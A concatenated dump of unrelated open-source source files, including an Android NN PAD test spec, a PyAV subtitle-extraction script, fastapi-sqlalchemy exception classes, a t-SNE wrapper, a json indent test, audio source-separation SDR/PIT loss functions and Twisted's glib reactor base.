i1 = Input("op1", "TENSOR_FLOAT32", "{1, 2, 3, 1}")
i2 = Parameter("op2", "TENSOR_INT32", "{4, 2}", [0, 0, 0, 2, 1, 3, 0, 0])
i3 = Output("op3", "TENSOR_FLOAT32", "{1, 4, 7, 1}")
model = model.Operation("PAD", i1, i2).To(i3)
model = model.RelaxedExecution(True)
# Example 1. Input in operand 0,
input0 = {i1: # input 0
[1.0, 2.0, 3.0,
4.0, 5.0, 6.0]}
output0 = {i3: # output 0
[0, 1, 2, 3, 0, 0, 0, 0, 4, 5, 6, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]}
# Instantiate an example
Example((input0, output0))
|
scratchpad/save_subtitles.py | Outflier/PyAV | 965 | 12611015 | """
As you can see, the subtitle API needs some work.
"""
import os
import sys
import pprint
from PIL import Image
from av import open
if not os.path.exists('subtitles'):
os.makedirs('subtitles')
video = open(sys.argv[1])
streams = [s for s in video.streams if s.type == b'subtitle']
if not streams:
print('no subtitles')
exit(1)
print(streams)
count = 0
for pi, packet in enumerate(video.demux([streams[0]])):
print('packet', pi)
for si, subtitle in enumerate(packet.decode()):
print('\tsubtitle', si, subtitle)
for ri, rect in enumerate(subtitle.rects):
if rect.type == 'ass':
print('\t\tass: ', rect, rect.ass.rstrip('\n'))
if rect.type == 'text':
print('\t\ttext: ', rect, rect.text.rstrip('\n'))
if rect.type == 'bitmap':
print('\t\tbitmap: ', rect, rect.width, rect.height, rect.pict_buffers)
buffers = [b for b in rect.pict_buffers if b is not None]
if buffers:
imgs = [
Image.frombuffer('L', (rect.width, rect.height), buffer, "raw", "L", 0, 1)
for buffer in buffers
]
if len(imgs) == 1:
img = imgs[0]
elif len(imgs) == 2:
img = Image.merge('LA', imgs)
else:
img = Image.merge('RGBA', imgs)
img.save('subtitles/%04d.png' % count)
count += 1
if count > 10:
pass
# exit()
|
fastapi_sqlalchemy/exceptions.py | cancan101/fastapi-sqlalchemy | 419 | 12611017 | <filename>fastapi_sqlalchemy/exceptions.py
class MissingSessionError(Exception):
"""Excetion raised for when the user tries to access a database session before it is created."""
def __init__(self):
msg = """
No session found! Either you are not currently in a request context,
or you need to manually create a session context by using a `db` instance as
a context manager e.g.:
with db():
db.session.query(User).all()
"""
super().__init__(msg)
class SessionNotInitialisedError(Exception):
"""Exception raised when the user creates a new DB session without first initialising it."""
def __init__(self):
msg = """
Session not initialised! Ensure that DBSessionMiddleware has been initialised before
attempting database access.
"""
super().__init__(msg)
|
tsne/_bh_sne.py | WiscEvan/tsne | 404 | 12611027 | import numpy as np
import scipy.linalg as la
from bh_sne import BH_SNE
def bh_sne(
data,
pca_d=None,
d=2,
perplexity=30.0,
theta=0.5,
random_state=None,
copy_data=False,
verbose=False,
):
"""
Run Barnes-Hut T-SNE on _data_.
@param data The data.
@param pca_d The dimensionality of data is reduced via PCA
to this dimensionality.
@param d The embedding dimensionality. Must be fixed to
2.
@param perplexity The perplexity controls the effective number of
neighbors.
@param theta If set to 0, exact t-SNE is run, which takes
very long for dataset > 5000 samples.
@param random_state A numpy RandomState object; if None, use
the numpy.random singleton. Init the RandomState
with a fixed seed to obtain consistent results
from run to run.
@param copy_data Copy the data to prevent it from being modified
by the C code
@param verbose Verbose output from the training process
"""
N, _ = data.shape
if pca_d is None:
if copy_data:
X = np.copy(data)
else:
X = data
else:
# do PCA
data -= data.mean(axis=0)
# working with covariance + (svd on cov.) is
# much faster than svd on data directly.
cov = np.dot(data.T, data) / N
u, s, v = la.svd(cov, full_matrices=False)
u = u[:, 0:pca_d]
X = np.dot(data, u)
if random_state is None:
seed = np.random.randint(2 ** 32 - 1)
else:
seed = random_state.randint(2 ** 32 - 1)
bh_tsne = BH_SNE()
Y = bh_tsne.run(X, N, X.shape[1], d, perplexity, theta, seed, verbose)
return Y
|
AppPkg/Applications/Python/Python-2.7.2/Lib/json/tests/test_indent.py | CEOALT1/RefindPlusUDK | 2,757 | 12611029 | import textwrap
from StringIO import StringIO
from json.tests import PyTest, CTest
class TestIndent(object):
def test_indent(self):
h = [['blorpie'], ['whoops'], [], 'd-shtaeou', 'd-nthiouh', 'i-vhbjkhnth',
{'nifty': 87}, {'field': 'yes', 'morefield': False} ]
expect = textwrap.dedent("""\
[
[
"blorpie"
],
[
"whoops"
],
[],
"d-shtaeou",
"d-nthiouh",
"i-vhbjkhnth",
{
"nifty": 87
},
{
"field": "yes",
"morefield": false
}
]""")
d1 = self.dumps(h)
d2 = self.dumps(h, indent=2, sort_keys=True, separators=(',', ': '))
h1 = self.loads(d1)
h2 = self.loads(d2)
self.assertEqual(h1, h)
self.assertEqual(h2, h)
self.assertEqual(d2, expect)
def test_indent0(self):
h = {3: 1}
def check(indent, expected):
d1 = self.dumps(h, indent=indent)
self.assertEqual(d1, expected)
sio = StringIO()
self.json.dump(h, sio, indent=indent)
self.assertEqual(sio.getvalue(), expected)
# indent=0 should emit newlines
check(0, '{\n"3": 1\n}')
# indent=None is more compact
check(None, '{"3": 1}')
class TestPyIndent(TestIndent, PyTest): pass
class TestCIndent(TestIndent, CTest): pass
|
torchrecipes/audio/source_separation/loss/utils.py | facebookresearch/recipes | 161 | 12611036 | <filename>torchrecipes/audio/source_separation/loss/utils.py
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
#!/usr/bin/env python3
# pyre-strict
import math
from itertools import permutations
from typing import Callable, Optional
import torch
def sdr(
estimate: torch.Tensor,
reference: torch.Tensor,
mask: Optional[torch.Tensor] = None,
epsilon: float = 1e-8,
) -> torch.Tensor:
"""Computes source-to-distortion ratio.
1. scale the reference signal with power(s_est * s_ref) / powr(s_ref * s_ref)
2. compute SNR between adjusted estimate and reference.
Args:
estimate (torch.Tensor): Estimtaed signal.
Shape: [batch, speakers (can be 1), time frame]
reference (torch.Tensor): Reference signal.
Shape: [batch, speakers, time frame]
mask (torch.Tensor or None, optional): Binary mask to indicate padded value (0) or valid value (1).
Shape: [batch, 1, time frame]
epsilon (float, optional): constant value used to stabilize division.
Returns:
torch.Tensor: scale-invariant source-to-distortion ratio.
Shape: [batch, speaker]
References:
- Single-channel multi-speaker separation using deep clustering
<NAME>, <NAME>, <NAME>, <NAME>, and <NAME>,
- Conv-TasNet: Surpassing Ideal Time--Frequency Magnitude Masking for Speech Separation
Luo, Yi and Mesgarani, Nima
https://arxiv.org/abs/1809.07454
Notes:
This function is tested to produce the exact same result as
https://github.com/naplab/Conv-TasNet/blob/e66d82a8f956a69749ec8a4ae382217faa097c5c/utility/sdr.py#L34-L56
"""
reference_pow = reference.pow(2).mean(dim=2, keepdim=True)
mix_pow = (estimate * reference).mean(dim=2, keepdim=True)
scale = mix_pow / (reference_pow + epsilon)
reference = scale * reference
error = estimate - reference
reference_pow = reference.pow(2)
error_pow = error.pow(2)
if mask is None:
reference_pow = reference_pow.mean(dim=2)
error_pow = error_pow.mean(dim=2)
else:
denom = mask.sum(dim=2)
reference_pow = (mask * reference_pow).sum(dim=2) / denom
error_pow = (mask * error_pow).sum(dim=2) / denom
return 10 * torch.log10(reference_pow) - 10 * torch.log10(error_pow)
class PIT(torch.nn.Module):
"""Applies utterance-level speaker permutation
Computes the maxium possible value of the given utility function
over the permutations of the speakers.
Args:
utility_func (function):
Function that computes the utility (opposite of loss) with signature of
(extimate: torch.Tensor, reference: torch.Tensor) -> torch.Tensor
where input Tensors are shape of [batch, speakers, frame] and
the output Tensor is shape of [batch, speakers].
References:
- Multi-talker Speech Separation with Utterance-level Permutation Invariant Training of
Deep Recurrent Neural Networks
<NAME>, <NAME>, <NAME> and <NAME>
https://arxiv.org/abs/1703.06284
"""
def __init__(self, utility_func: Callable[..., torch.Tensor]) -> None:
super().__init__()
self.utility_func = utility_func
def forward(
self,
estimate: torch.Tensor,
reference: torch.Tensor,
mask: Optional[torch.Tensor] = None,
epsilon: float = 1e-8,
) -> torch.Tensor:
"""Compute utterance-level PIT Loss
Args:
estimate (torch.Tensor): Estimated source signals.
Shape: [bacth, speakers, time frame]
reference (torch.Tensor): Reference (original) source signals.
Shape: [batch, speakers, time frame]
mask (torch.Tensor or None, optional): Binary mask to indicate padded value (0) or valid value (1).
Shape: [batch, 1, time frame]
epsilon (float, optional): constant value used to stabilize division.
Returns:
torch.Tensor: Maximum criterion over the speaker permutation.
Shape: [batch, ]
"""
assert estimate.shape == reference.shape
batch_size, num_speakers = reference.shape[:2]
num_permute = math.factorial(num_speakers)
util_mat = torch.zeros(
batch_size, num_permute, dtype=estimate.dtype, device=estimate.device
)
for i, idx in enumerate(permutations(range(num_speakers))):
util = self.utility_func(
estimate, reference[:, idx, :], mask=mask, epsilon=epsilon
)
util_mat[:, i] = util.mean(dim=1) # take the average over speaker dimension
return util_mat.max(dim=1).values
_sdr_pit = PIT(utility_func=sdr)
def sdr_pit(
estimate: torch.Tensor,
reference: torch.Tensor,
mask: Optional[torch.Tensor] = None,
epsilon: float = 1e-8,
) -> torch.Tensor:
"""Computes scale-invariant source-to-distortion ratio.
1. adjust both estimate and reference to have 0-mean
2. scale the reference signal with power(s_est * s_ref) / powr(s_ref * s_ref)
3. compute SNR between adjusted estimate and reference.
Args:
estimate (torch.Tensor): Estimtaed signal.
Shape: [batch, speakers (can be 1), time frame]
reference (torch.Tensor): Reference signal.
Shape: [batch, speakers, time frame]
mask (torch.Tensor or None, optional): Binary mask to indicate padded value (0) or valid value (1).
Shape: [batch, 1, time frame]
epsilon (float, optional): constant value used to stabilize division.
Returns:
torch.Tensor: scale-invariant source-to-distortion ratio.
Shape: [batch, speaker]
References:
- Single-channel multi-speaker separation using deep clustering
<NAME>, <NAME>, <NAME>, <NAME>, and <NAME>,
- Conv-TasNet: Surpassing Ideal Time--Frequency Magnitude Masking for Speech Separation
Luo, Yi and Mesgarani, Nima
https://arxiv.org/abs/1809.07454
Notes:
This function is tested to produce the exact same result as the reference implementation,
*when the inputs have 0-mean*
https://github.com/naplab/Conv-TasNet/blob/e66d82a8f956a69749ec8a4ae382217faa097c5c/utility/sdr.py#L107-L153
"""
return _sdr_pit(estimate, reference, mask, epsilon)
def sdri(
estimate: torch.Tensor,
reference: torch.Tensor,
mix: torch.Tensor,
mask: Optional[torch.Tensor] = None,
epsilon: float = 1e-8,
) -> torch.Tensor:
"""Compute the improvement of SDR (SDRi).
This function compute how much SDR is improved if the estimation is changed from
the original mixture signal to the actual estimated source signals. That is,
``SDR(estimate, reference) - SDR(mix, reference)``.
For computing ``SDR(estimate, reference)``, PIT (permutation invariant training) is applied,
so that best combination of sources between the reference signals and the esimate signals
are picked.
Args:
estimate (torch.Tensor): Estimated source signals.
Shape: [batch, speakers, time frame]
reference (torch.Tensor): Reference (original) source signals.
Shape: [batch, speakers, time frame]
mix (torch.Tensor): Mixed souce signals, from which the setimated signals were generated.
Shape: [batch, speakers == 1, time frame]
mask (torch.Tensor or None, optional): Binary mask to indicate padded value (0) or valid value (1).
Shape: [batch, 1, time frame]
epsilon (float, optional): constant value used to stabilize division.
Returns:
torch.Tensor: Improved SDR. Shape: [batch, ]
References:
- Conv-TasNet: Surpassing Ideal Time--Frequency Magnitude Masking for Speech Separation
<NAME> and <NAME>
https://arxiv.org/abs/1809.07454
"""
sdr_ = sdr_pit(estimate, reference, mask=mask, epsilon=epsilon) # [batch, ]
base_sdr = sdr(mix, reference, mask=mask, epsilon=epsilon) # [batch, speaker]
return sdr_ - base_sdr.mean(dim=1)
|
config/__init__.py | Neuralearn/PAN.pytorch | 419 | 12611071 | # -*- coding: utf-8 -*-
# @Time : 2019/8/23 21:50
# @Author : zhoujun |
src/twisted/internet/_glibbase.py | giadram/twisted | 4,612 | 12611080 | <reponame>giadram/twisted
# -*- test-case-name: twisted.internet.test -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
This module provides base support for Twisted to interact with the glib/gtk
mainloops.
The classes in this module should not be used directly, but rather you should
import gireactor or gtk3reactor for GObject Introspection based applications,
or glib2reactor or gtk2reactor for applications using legacy static bindings.
"""
import sys
from zope.interface import implementer
from twisted.internet import base, posixbase, selectreactor
from twisted.internet.interfaces import IReactorFDSet
from twisted.python import log
def ensureNotImported(moduleNames, errorMessage, preventImports=[]):
"""
Check whether the given modules were imported, and if requested, ensure
they will not be importable in the future.
@param moduleNames: A list of module names we make sure aren't imported.
@type moduleNames: C{list} of C{str}
@param preventImports: A list of module name whose future imports should
be prevented.
@type preventImports: C{list} of C{str}
@param errorMessage: Message to use when raising an C{ImportError}.
@type errorMessage: C{str}
@raise ImportError: with given error message if a given module name
has already been imported.
"""
for name in moduleNames:
if sys.modules.get(name) is not None:
raise ImportError(errorMessage)
# Disable module imports to avoid potential problems.
for name in preventImports:
sys.modules[name] = None
class GlibWaker(posixbase._UnixWaker):
"""
Run scheduled events after waking up.
"""
def doRead(self):
posixbase._UnixWaker.doRead(self)
self.reactor._simulate()
@implementer(IReactorFDSet)
class GlibReactorBase(posixbase.PosixReactorBase, posixbase._PollLikeMixin):
"""
Base class for GObject event loop reactors.
Notification for I/O events (reads and writes on file descriptors) is done
by the gobject-based event loop. File descriptors are registered with
gobject with the appropriate flags for read/write/disconnect notification.
Time-based events, the results of C{callLater} and C{callFromThread}, are
handled differently. Rather than registering each event with gobject, a
single gobject timeout is registered for the earliest scheduled event, the
output of C{reactor.timeout()}. For example, if there are timeouts in 1, 2
and 3.4 seconds, a single timeout is registered for 1 second in the
future. When this timeout is hit, C{_simulate} is called, which calls the
appropriate Twisted-level handlers, and a new timeout is added to gobject
by the C{_reschedule} method.
To handle C{callFromThread} events, we use a custom waker that calls
C{_simulate} whenever it wakes up.
@ivar _sources: A dictionary mapping L{FileDescriptor} instances to
GSource handles.
@ivar _reads: A set of L{FileDescriptor} instances currently monitored for
reading.
@ivar _writes: A set of L{FileDescriptor} instances currently monitored for
writing.
@ivar _simtag: A GSource handle for the next L{simulate} call.
"""
# Install a waker that knows it needs to call C{_simulate} in order to run
# callbacks queued from a thread:
_wakerFactory = GlibWaker
def __init__(self, glib_module, gtk_module, useGtk=False):
self._simtag = None
self._reads = set()
self._writes = set()
self._sources = {}
self._glib = glib_module
self._gtk = gtk_module
posixbase.PosixReactorBase.__init__(self)
self._source_remove = self._glib.source_remove
self._timeout_add = self._glib.timeout_add
def _mainquit():
if self._gtk.main_level():
self._gtk.main_quit()
if useGtk:
self._pending = self._gtk.events_pending
self._iteration = self._gtk.main_iteration_do
self._crash = _mainquit
self._run = self._gtk.main
else:
self.context = self._glib.main_context_default()
self._pending = self.context.pending
self._iteration = self.context.iteration
self.loop = self._glib.MainLoop()
self._crash = lambda: self._glib.idle_add(self.loop.quit)
self._run = self.loop.run
def _handleSignals(self):
# First, install SIGINT and friends:
base._SignalReactorMixin._handleSignals(self)
# Next, since certain versions of gtk will clobber our signal handler,
# set all signal handlers again after the event loop has started to
# ensure they're *really* set. We don't call this twice so we don't
# leak file descriptors created in the SIGCHLD initialization:
self.callLater(0, posixbase.PosixReactorBase._handleSignals, self)
# The input_add function in pygtk1 checks for objects with a
# 'fileno' method and, if present, uses the result of that method
# as the input source. The pygtk2 input_add does not do this. The
# function below replicates the pygtk1 functionality.
# In addition, pygtk maps gtk.input_add to _gobject.io_add_watch, and
# g_io_add_watch() takes different condition bitfields than
# gtk_input_add(). We use g_io_add_watch() here in case pygtk fixes this
# bug.
def input_add(self, source, condition, callback):
if hasattr(source, "fileno"):
# handle python objects
def wrapper(ignored, condition):
return callback(source, condition)
fileno = source.fileno()
else:
fileno = source
wrapper = callback
return self._glib.io_add_watch(
fileno, condition, wrapper, priority=self._glib.PRIORITY_DEFAULT_IDLE
)
def _ioEventCallback(self, source, condition):
"""
Called by event loop when an I/O event occurs.
"""
log.callWithLogger(source, self._doReadOrWrite, source, source, condition)
return True # True = don't auto-remove the source
def _add(self, source, primary, other, primaryFlag, otherFlag):
"""
Add the given L{FileDescriptor} for monitoring either for reading or
writing. If the file is already monitored for the other operation, we
delete the previous registration and re-register it for both reading
and writing.
"""
if source in primary:
return
flags = primaryFlag
if source in other:
self._source_remove(self._sources[source])
flags |= otherFlag
self._sources[source] = self.input_add(source, flags, self._ioEventCallback)
primary.add(source)
def addReader(self, reader):
"""
Add a L{FileDescriptor} for monitoring of data available to read.
"""
self._add(reader, self._reads, self._writes, self.INFLAGS, self.OUTFLAGS)
def addWriter(self, writer):
"""
Add a L{FileDescriptor} for monitoring ability to write data.
"""
self._add(writer, self._writes, self._reads, self.OUTFLAGS, self.INFLAGS)
def getReaders(self):
"""
Retrieve the list of current L{FileDescriptor} monitored for reading.
"""
return list(self._reads)
def getWriters(self):
"""
Retrieve the list of current L{FileDescriptor} monitored for writing.
"""
return list(self._writes)
def removeAll(self):
"""
Remove monitoring for all registered L{FileDescriptor}s.
"""
return self._removeAll(self._reads, self._writes)
def _remove(self, source, primary, other, flags):
"""
Remove monitoring the given L{FileDescriptor} for either reading or
writing. If it's still monitored for the other operation, we
re-register the L{FileDescriptor} for only that operation.
"""
if source not in primary:
return
self._source_remove(self._sources[source])
primary.remove(source)
if source in other:
self._sources[source] = self.input_add(source, flags, self._ioEventCallback)
else:
self._sources.pop(source)
def removeReader(self, reader):
"""
Stop monitoring the given L{FileDescriptor} for reading.
"""
self._remove(reader, self._reads, self._writes, self.OUTFLAGS)
def removeWriter(self, writer):
"""
Stop monitoring the given L{FileDescriptor} for writing.
"""
self._remove(writer, self._writes, self._reads, self.INFLAGS)
def iterate(self, delay=0):
"""
One iteration of the event loop, for trial's use.
This is not used for actual reactor runs.
"""
self.runUntilCurrent()
while self._pending():
self._iteration(0)
def crash(self):
"""
Crash the reactor.
"""
posixbase.PosixReactorBase.crash(self)
self._crash()
def stop(self):
"""
Stop the reactor.
"""
posixbase.PosixReactorBase.stop(self)
# The base implementation only sets a flag, to ensure shutting down is
# not reentrant. Unfortunately, this flag is not meaningful to the
# gobject event loop. We therefore call wakeUp() to ensure the event
# loop will call back into Twisted once this iteration is done. This
# will result in self.runUntilCurrent() being called, where the stop
# flag will trigger the actual shutdown process, eventually calling
# crash() which will do the actual gobject event loop shutdown.
self.wakeUp()
def run(self, installSignalHandlers=True):
"""
Run the reactor.
"""
self.callWhenRunning(self._reschedule)
self.startRunning(installSignalHandlers=installSignalHandlers)
if self._started:
self._run()
def callLater(self, *args, **kwargs):
"""
Schedule a C{DelayedCall}.
"""
result = posixbase.PosixReactorBase.callLater(self, *args, **kwargs)
# Make sure we'll get woken up at correct time to handle this new
# scheduled call:
self._reschedule()
return result
def _reschedule(self):
"""
Schedule a glib timeout for C{_simulate}.
"""
if self._simtag is not None:
self._source_remove(self._simtag)
self._simtag = None
timeout = self.timeout()
if timeout is not None:
self._simtag = self._timeout_add(
int(timeout * 1000),
self._simulate,
priority=self._glib.PRIORITY_DEFAULT_IDLE,
)
def _simulate(self):
"""
Run timers, and then reschedule glib timeout for next scheduled event.
"""
self.runUntilCurrent()
self._reschedule()
class PortableGlibReactorBase(selectreactor.SelectReactor):
"""
Base class for GObject event loop reactors that works on Windows.
Sockets aren't supported by GObject's input_add on Win32.
"""
def __init__(self, glib_module, gtk_module, useGtk=False):
self._simtag = None
self._glib = glib_module
self._gtk = gtk_module
selectreactor.SelectReactor.__init__(self)
self._source_remove = self._glib.source_remove
self._timeout_add = self._glib.timeout_add
def _mainquit():
if self._gtk.main_level():
self._gtk.main_quit()
if useGtk:
self._crash = _mainquit
self._run = self._gtk.main
else:
self.loop = self._glib.MainLoop()
self._crash = lambda: self._glib.idle_add(self.loop.quit)
self._run = self.loop.run
def crash(self):
selectreactor.SelectReactor.crash(self)
self._crash()
def run(self, installSignalHandlers=True):
self.startRunning(installSignalHandlers=installSignalHandlers)
self._timeout_add(0, self.simulate)
if self._started:
self._run()
def simulate(self):
"""
Run simulation loops and reschedule callbacks.
"""
if self._simtag is not None:
self._source_remove(self._simtag)
self.iterate()
timeout = min(self.timeout(), 0.01)
if timeout is None:
timeout = 0.01
self._simtag = self._timeout_add(
int(timeout * 1000),
self.simulate,
priority=self._glib.PRIORITY_DEFAULT_IDLE,
)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.